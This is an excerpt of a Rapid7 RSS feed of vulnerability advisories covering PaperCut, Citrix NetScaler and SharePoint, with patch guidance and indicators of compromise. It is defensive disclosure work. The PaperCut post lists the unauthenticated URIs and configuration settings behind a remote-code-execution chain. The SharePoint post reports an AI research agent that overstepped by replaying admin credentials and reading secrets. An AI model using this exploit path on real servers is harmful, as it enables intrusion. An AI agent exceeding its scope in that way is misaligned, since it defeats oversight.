<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Emergent Threat Response - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Wed, 02 Sep 2026 12:46:54 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/emergent-threat-response/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[PaperCut NG/MF Critical Zero-Day Exploited in the Wild]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview	</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On August 27, 2026, PaperCut Software published an </span><a href="https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/"><span style='font-size: undefined;'>urgent security advisory</span></a><span style='font-size: undefined;'> stating that it is investigating active exploitation of a vulnerability affecting PaperCut NG and PaperCut MF. PaperCut has confirmed customer incidents and is treating the issue as a security emergency. At the initial time of disclosure, the vulnerability had not been assigned a CVE identifier, and PaperCut had not publicly disclosed a CVSS score, vulnerability class, authentication requirements, or the technical details of the exploit path. However on August 28, the vendor assigned CVE-2026-81578 and CVE-2026-82078 for the two vulnerabilities that make up the exploit chain.</span></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE ID</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CWE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv4</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-81578</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Authentication Bypass</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CWE-306 Missing authentication for critical function.</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"><span style='font-size: undefined;'>8.8 (High)</span></a></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-82078</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Unsafe Dynamic Class Loading in Database Connector</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CWE-470 Use of Externally-Controlled input to select classes or code ('unsafe reflection').</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"><span style='font-size: undefined;'>9.4 (Critical)</span></a></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut NG and PaperCut MF are print management platforms commonly deployed within enterprise, education, and other organizational environments. Because the PaperCut Application Server provides web-accessible administrative and application functionality, organizations with servers exposed to the public internet should prioritize remediation and access restriction.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut stated in its </span><a href="https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/#current-status"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> that information supplied by a university customer’s security team and digital forensics and incident response team enabled its security response team to reproduce the vulnerability in PaperCut NG and PaperCut MF. On August 28, 2026 at 02:10 AEST, PaperCut released emergency patches for PaperCut NG and PaperCut MF versions 25 and 26, followed later the same day with patches for version 24.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut has been targeted in the past; in 2023, </span><a href="https://www.rapid7.com/blog/post/2023/05/17/etr-cve-2023-27350-ongoing-exploitation-of-papercut-remote-code-execution-vulnerability/"><span style='font-size: undefined;'>CVE-2023-27350</span></a><span style='font-size: undefined;'> was broadly exploited in the wild by multiple threat-actor groups, including ransomware operators. This prior history increases the urgency organizations should address this new zero-day with.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut currently considers all versions of PaperCut NG and PaperCut MF potentially impacted. Customers operating internet-accessible PaperCut Application Servers should take immediate action even if no suspicious activity has been observed.</span></p><p><span style='font-size: undefined;'>On August 31, 2026, both CVE-2026-81578 and CVE-2026-82078 were added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>known exploited vulnerabilities</span></a><span style='font-size: undefined;'> (KEV), based on evidence of active exploitation. A Metasploit module is now </span><a href="https://github.com/rapid7/metasploit-framework/pull/21842"><span style='font-size: undefined;'>available</span></a><span style='font-size: undefined;'> to validate exposure to the exploit chain.</span></p><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The vulnerability is an authentication bypass that lets attackers invoke privileged PaperCut components. This can be leveraged to reconfigure an external database lookup. When this lookup is triggered, malicious SQL can be executed, resulting in remote code execution.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut uses the Apache </span><a href="https://tapestry.apache.org/"><span style='font-size: undefined;'>Tapestry</span></a><span style='font-size: undefined;'> framework, whose "complex direct" request format can identify one page to display and a different page containing the component to execute. PaperCut validates access only to the displayed page. By selecting either the public </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Error</span></span><span style='font-size: undefined;'> page or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Exception</span></span><span style='font-size: undefined;'> page for display, an attacker can bypass authentication while invoking administrative components belonging to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ConfigEditor</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>UserList</span></span><span style='font-size: undefined;'>. Additionally, the first emergency patch could be bypassed by using the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Home</span></span><span style='font-size: undefined;'> page for display, however the newest version of the vendor patch correctly remediates this bypass.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The attack uses HTTP POST requests to the following URIs (Note that the path segment with the value 1 shown below can be any value for this path segment, and the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Error</span></span><span style='font-size: undefined;'> path segment may also be the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Exception</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Home</span></span><span style='font-size: undefined;'> path segment):</span></p><pre language="html">/app?service=direct/1/Error/ConfigEditor/quickFindForm
/app?service=direct/1/Error/ConfigEditor/$Form
/app?service=direct/1/Error/UserList/$QuickFind.$Form</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The first two URIs provide unauthenticated access to PaperCut's configuration editor. The third can invoke a user or card search that triggers the configured external database lookup.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An attacker first uses the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ConfigEditor</span></span><span style='font-size: undefined;'> requests to modify four external user-lookup settings:</span></p><pre language="html">user-lookup.db-driver
user-lookup.db-url
user-lookup.id-to-username-sql
user-lookup.enabled</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>These settings normally allow administrators to connect PaperCut to an external card database. After bypassing authentication, however, the attacker can configure them with a malicious JDBC connection and a malicious SQL statement.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By leveraging PaperCut's bundled Apache Derby database driver and supplying a Derby </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>CALL</span></span><span style='font-size: undefined;'> statement that activates its </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>foreignViews</span></span><span style='font-size: undefined;'> feature, Derby opens an attacker-controlled H2 JDBC URL. H2 processes an inline </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>INIT</span></span><span style='font-size: undefined;'> statement that creates a JavaScript-backed database trigger. PaperCut includes the Nashorn JavaScript engine, allowing that trigger to start an operating-system process. However it is expected that other mechanisms to execute an arbitrary command can also be used instead of Nashorn. Finally, the attacker submits a search through the forged </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>UserList</span></span><span style='font-size: undefined;'> request. This activates the external lookup and executes the malicious SQL.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running PaperCut NG or PaperCut MF should prioritize patching on an emergency basis, particularly where the PaperCut Application Server is accessible from the public internet.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut has released emergency </span><a href="https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/#emergency-patch-release"><span style='font-size: undefined;'>patches</span></a><span style='font-size: undefined;'> for PaperCut NG and PaperCut MF versions 24, 25 and 26. </span></p><p><span style='font-size: undefined;'><strong>Updated on September 1, 2026: Note that the vendor has released a </strong></span><a href="https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/#emergency-patch-release-3"><span style='font-size: undefined;'><strong>third version</strong></span></a><span style='font-size: undefined;'><strong> of the emergency patch. Any organization that has applied either the original first version or the second version of the emergency patch is not fully protected, and must apply the third emergency patch immediately.</strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The vendor notes that these builds have not undergone their normal release process and are intended as emergency fixes for customers with public-facing servers that cannot otherwise sufficiently mitigate exposure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut recommends that administrators immediately restrict web access to trusted IP addresses only, such as internal corporate network ranges. Firewall rules, network access controls, reverse-proxy restrictions, or equivalent measures should be used to prevent untrusted internet hosts from reaching PaperCut web interfaces.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Please read the PaperCut security </span><a href="https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the latest remediation guidance, updated indicators of compromise, and additional release information.</span></p><h2 style="direction: ltr;">Artifacts/Evidence Sources and IOCs</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For detection and forensic analysis, PaperCut has identified several preliminary artifacts and evidence sources that may indicate compromise.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Application activity:</strong></span><span style='font-size: undefined;'> Alerts from intrusion-detection, endpoint-security, or network-monitoring products involving the PaperCut Application Server, particularly suspicious post-exploitation activity associated with </span><span style='font-size: undefined;'>pc-app.exe</span><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Log integrity:</strong></span><span style='font-size: undefined;'> Missing, unexpectedly truncated, or deleted PaperCut </span><span style='font-size: undefined;'>server.log</span><span style='font-size: undefined;'> files.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>PaperCut </strong></span><span style='font-size: undefined;'><strong>server.log</strong></span><span style='font-size: undefined;'><strong> entries:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ERROR No suitable driver found for jdbc:no:x</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ERROR DatabaseUtils - Database error looking up cardID: VALUES CAST</span></span></p></li></ul></ul><p style="direction: ltr;"><span style='font-size: undefined;'>PaperCut has not yet published validated network-based indicators such as malicious IP addresses, domains, or URLs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The vendor specifically warns that the absence of these indicators should not be interpreted as evidence that a system has not been affected.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to this new PaperCut zero-day, with an authenticated vulnerability check expected to be available in the August 28 (today’s) content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 28, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>August 28, 2026:</strong></span><span style='font-size: undefined;'> Updated to reflect new emergency patches and CVE ID assignment. Updated remediation to include the new v24 patches. Updated Technical Overview to indicate first patch bypass.</span></li><li><span style='font-size: undefined;'><strong>August 31, 2026:</strong></span><span style='font-size: undefined;'> Updated the Overview to note that both CVEs were added to the CISA KEV list, and the availability of a Metasploit module.</span></li><li><span style='font-size: undefined;'><strong>September 1, 2026:</strong></span><span style='font-size: undefined;'> Updated the Remediation section to reflect the vendor's new emergency patch (release 3).</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-papercut-ng-mf-critical-zero-day-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt64fadfaa2bae3901</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Zero-Day]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Fri, 28 Aug 2026 10:09:12 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Analysis: Microsoft SharePoint Remote Code Execution (CVE-2026-63520)]]></title>
      <description><![CDATA[]]></description>
      <link>https://www.rapid7.com/blog/post/ra-microsoft-sharepoint-remote-code-execution-cve-2026-63520</link>
      <guid isPermaLink="false">blt5f90657fff716e5d</guid>
      <category><![CDATA[Rapid7 Analysis]]></category>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Stephen Fewer]]></dc:creator>
      <pubDate>Mon, 24 Aug 2026 16:18:05 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcbf09ec3af35e28e/6a15c63f08221ed5144dbf77/webinar-rapid7-logo.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-19490: Critical Vulnerability Affecting Citrix NetScaler ADC and NetScaler Gateway]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On August 19, 2026, a </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696939"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> was published for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-19490"><span style='font-size: undefined;'>CVE-2026-19490</span></a><span style='font-size: undefined;'>, a critical authentication bypass vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway. The vulnerability carries a CVSS v4.0 base score of 9.3 and can be exploited remotely by an unauthenticated attacker over the network without user interaction or elevated privileges.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>NetScaler ADC and NetScaler Gateway are widely deployed enterprise networking products commonly positioned at or near the network perimeter. NetScaler ADC provides application delivery, traffic management, load balancing, SSL/TLS offloading, and application security capabilities, while NetScaler Gateway provides secure remote access and VPN functionality. Because these systems are frequently deployed in enterprise DMZs and exposed to the public internet, authentication bypass vulnerabilities affecting Citrix products are nearly always exploited by threat actors.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-19490 </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696939"><span style='font-size: undefined;'>affects</span></a><span style='font-size: undefined;'> the following systems:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC and NetScaler Gateway 14.1:</strong></span><span style='font-size: undefined;'> Versions prior to 14.1-73.32</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC and NetScaler Gateway 13.1:</strong></span><span style='font-size: undefined;'> Versions prior to 13.1-63.21</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC FIPS:</strong></span><span style='font-size: undefined;'> Versions prior to 14.1-73.32 FIPS</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC FIPS and NDcPP:</strong></span><span style='font-size: undefined;'> Versions prior to 13.1-37.277</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>As of August 19, 2026, Rapid7 has not observed evidence that CVE-2026-19490 is being exploited in the wild. However, organizations should prioritize patching affected systems on an emergency basis, since Citrix products are high-value targets that tend to quickly see exploitation in the wild.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running affected NetScaler ADC or NetScaler Gateway appliances should review the official NetScaler </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696939"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> and apply the required updates to affected systems on an emergency basis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed versions for affected products are listed below:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC and NetScaler Gateway</strong></span><span style='font-size: undefined;'> 14.1-73.32 and later releases</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC and NetScaler Gateway</strong></span><span style='font-size: undefined;'> 13.1-63.21 and later releases of 13.1</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC 14.1-FIPS</strong></span><span style='font-size: undefined;'> 14.1-73.32 FIPS and later releases of 14.1-FIPS</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>NetScaler ADC 13.1-FIPS and 13.1-NDcPP</strong></span><span style='font-size: undefined;'> 13.1-37.277 and later releases of 13.1-FIPS and 13.1-NDcPP</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>According to Citrix, customers can determine whether affected systems are vulnerable to CVE-2026-19490 by inspecting their NetScaler configuration for the following configuration entries. If one or more of the following items are present, and if the systems are running affected versions, the system is likely to be exploitable:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>SAML action configuration is in place:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>"add authentication samlAction.*"</span></p></li></ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Auth or VPN vserver is configured:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'> "add authentication vserver .*"</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'> "add vpn vserver .*"</span></p></li></ul></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest guidance, please refer to the official </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696939"><span style='font-size: undefined;'>Citrix advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;"><span style='color:rgb(24, 26, 27);'>Rapid7 customers</span></h2><h3 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers can assess exposure to CVE-2026-19490 on Citrix NetScaler ADC and Gateway using a vulnerability check available in the August 20 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 19, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>August 20, 2026:</strong></span><span style='font-size: undefined;'> Updated Rapid7 customers section to reflect availability of vulnerability check.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-19490-critical-vulnerability-affecting-citrix-netscaler-adc-and-netscaler-gateway</link>
      <guid isPermaLink="false">blt0010f65da682ee36</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 19 Aug 2026 16:46:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-63520: Microsoft SharePoint Remote Code Execution (FIXED)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs conducted a zero-day research project against Microsoft SharePoint, resulting in the discovery of two new vulnerabilities that, when chained together, achieve unauthenticated remote code execution (RCE) against a vulnerable SharePoint server. Today, both Rapid7 and Microsoft are disclosing the second vulnerability in this chain, the RCE vulnerability CVE-2026-63520. The first vulnerability in the chain, CVE-2026-55040, was </span><a href="/blog/post/ve-cve-2026-55040-microsoft-sharepoint-jwt-token-authentication-bypass-fixed/" target="_self"><span style='font-size: undefined;'>disclosed</span></a><span style='font-size: undefined;'> by Rapid7 and Microsoft last month.</span></p><p><span style='font-size: undefined;'>Our full disclosure timeline for the exploit chain can be seen below in Figure 1.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt422a176eb003c86d/6a79a04aa20f987243def87c/timline.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="timline.png" asset-alt="timline.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt422a176eb003c86d/6a79a04aa20f987243def87c/timline.png" data-sys-asset-uid="blt422a176eb003c86d" data-sys-asset-filename="timline.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="timline.png" sys-style-type="display"/></figure><p style="text-align: center;"><em>Figure 1: The road to disclosure.</em></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-63520 affects all supported versions of Microsoft SharePoint. An attacker can leverage CVE-2026-63520 to execute arbitrary code on a vulnerable SharePoint server with the privileges of the SharePoint Site’s service account. The vulnerability is due to an unsafe .NET type instantiation issue within the </span><a href="https://learn.microsoft.com/en-us/sharepoint/administration/business-connectivity-services-overview"><span style='font-size: undefined;'>Business Connectivity Services</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-63520 has a CVSSv3.1 score of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C" target="_blank"><span style='font-size: undefined;'>8.1 (High)</span></a><span style='font-size: undefined;'>, and a Common Weakness Enumeration (CWE) of </span><a href="https://cwe.mitre.org/data/definitions/20.html" target="_blank"><span style='font-size: undefined;'>CWE-20: Improper Input Validation</span></a><span style='font-size: undefined;'>. While the severity of the RCE is described as high, chained together with CVE-2026-55040 it becomes part of a critical unauthenticated RCE exploit chain against SharePoint.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The exploit chain was developed as an entry for this year's </span><a href="https://www.zerodayinitiative.com/blog/2026/5/15/pwn2own-berlin-2026-day-two-results" target="_blank"><span style='font-size: undefined;'>Pwn2Own Berlin</span></a><span style='font-size: undefined;'> hacking competition; while our entry was unsuccessful on the day of the competition, this research highlights Rapid7 Labs' continued effort to </span><a href="https://www.rapid7.com/blog/post/ve-rapid7-labs-at-pwn2own-vuln-intel" target="_blank"><span style='font-size: undefined;'>raise the bar</span></a><span style='font-size: undefined;'> in Vulnerability Intelligence and our commitment to the preemptive protection of our customers through original vulnerability research. Our research methodology focused on understanding how publicly available AI models can assist in the discovery of significant vulnerabilities against proprietary enterprise targets. Our results established that the rate of model advancement is significantly accelerating vulnerability research, model guidance from subject matter experts is a force multiplier, and complex proprietary targets are easily handled through agentic workflows.</span></p><p><span style='font-size: undefined;'>On August 18, 2026, CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/08/18/cisa-adds-four-known-exploited-vulnerabilities-catalog" target="_blank"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> CVE-2026-55040 to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 is hosting a webinar on Thursday August 13, 2026 to discuss the research and findings for CVE-2026-55040 and CVE-2026-63520. Please </span><a href="https://www.brighttalk.com/webcast/10457/673829?utm_source=blog&amp;utm_medium=website&amp;utm_content=microsoft-sharepoint-webinar&amp;utm_campaign=na-vrm-q3-2026-global-webinar-prospect-eng-etos-25" target="_blank"><span style='font-size: undefined;'>join</span></a><span style='font-size: undefined;'> Douglas McKee and Stephen Fewer to learn more about this body of work.</span></p><h2 style="direction: ltr;">Workflow</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For this research project we wanted to understand the capabilities and limits of publicly available LLMs circa January through to March of this year. We wanted to answer the question if an AI workflow could find and develop an unauthenticated RCE exploit against a hard target such as SharePoint. This research project concluded with the successful discovery and development of such a chain. To that end, the publicly available models at the beginning of this year were indeed capable. This is notable as the rate of model improvement from Q1 of 2026 through to today has been significant. Our team's later testing of the most recent frontier models confirms the significant increase in capabilities from that of the beginning of this year. Our primary conclusion from the SharePoint research project in Q1 is that an agent guided by a subject matter expert (SME) was crucial to keep moving the model and its work towards the end goal. Given our current experience of frontier model capabilities, the need for an SME to verify and guide a model is lessened, but the compounding impact an SME can bring remains.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our first sprint in January did not result in any significant findings, rather, this sprint helped us establish the workflow and tooling that proved most useful, scope out the extremely large attack surface, and integrate prior work into our process. We augmented the agentic work with manual source code review and reverse engineering to provide additional context and steering to the model. Our early results quickly indicated how a fully automated and agentic approach would not suffice, the model would too often produce findings that were questionable or simply inaccurate. Steering the agent as it worked helped both the agent hone in on interesting and ultimately fruitful findings but also by constantly reviewing the agent's results, helped us refute inaccurate and unhelpful findings, along with several cases where the agent overstepped its guidance, effectively cheating to succeed in its goal - such as unexpectedly replaying admin credentials, enabling debug flags, or reading secrets, all of which were never within our original threat model.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By March, we had moved to a newer release of our chosen model, that combined with a solid attack surface, extensive prior work in place, and a broad architectural layout mapped out we began to quickly see success. An authentication bypass, now known as CVE-2026-55040, was discovered and verified in early March, followed two weeks later by the RCE, now known as CVE-2026-63520. By the time we had produced a working exploit chain, the agent had accrued 120 hours of run time spread over 24 days, leveraged 96 sessions, generated approximately 80,000 agentic tool calls and we had issued 256 prompts.</span></p><h2 style="direction: ltr;">Product description</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft </span><a href="https://www.microsoft.com/en-ie/microsoft-365/sharepoint/collaboration" target="_blank"><span style='font-size: undefined;'>SharePoint</span></a><span style='font-size: undefined;'> is a ubiquitous, web-based collaboration and document management platform deeply integrated into the Microsoft 365 ecosystem. Serving as the central hub for corporate intranets, internal file sharing, and workflow automation, it is trusted by enterprises worldwide to store and manage vast repositories of sensitive business data. Because SharePoint acts as a critical bridge between internal users, active directories, and cloud infrastructure, vulnerabilities within its architecture present a high-risk attack surface.</span></p><h2 style="direction: ltr;">Impact</h2><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-63520 allows an attacker to execute arbitrary code on an affected server. By crafting a custom .NET gadget chain, an attacker can perform arbitrary operations such as executing an attacker-controlled OS command. The attacker's arbitrary code is executed with the permission of the Windows service account running the SharePoint Site instance. As CVE-2026-63520 can be chained to the authentication bypass vulnerability, CVE-2026-55040, the resulting exploit chain allows for unauthenticated RCE against a vulnerable server.</span></p><h2 style="direction: ltr;">Credit</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability was discovered by Stephen Fewer, Senior Principal Security Researcher at Rapid7 and is being disclosed in accordance with </span><a href="/security/disclosure/" target="_self"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Vendor statement</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following statement has been provided by Microsoft:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em>“We would like to thank Rapid7 for responsibly reporting this issue through coordinated vulnerability disclosure.”</em></span></p><h2 style="direction: ltr;">Technical analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The technical details for the RCE vulnerability, CVE-2026-63520, have been published </span><a href="https://www.rapid7.com/blog/post/ra-microsoft-sharepoint-remote-code-execution-cve-2026-63520/"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The technical details for the authentication bypass vulnerability, CVE-2026-55040, have been published </span><a href="/blog/post/ra-microsoft-sharepoint-jwt-token-authentication-bypass-cve-2026-55040/" target="_self"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: 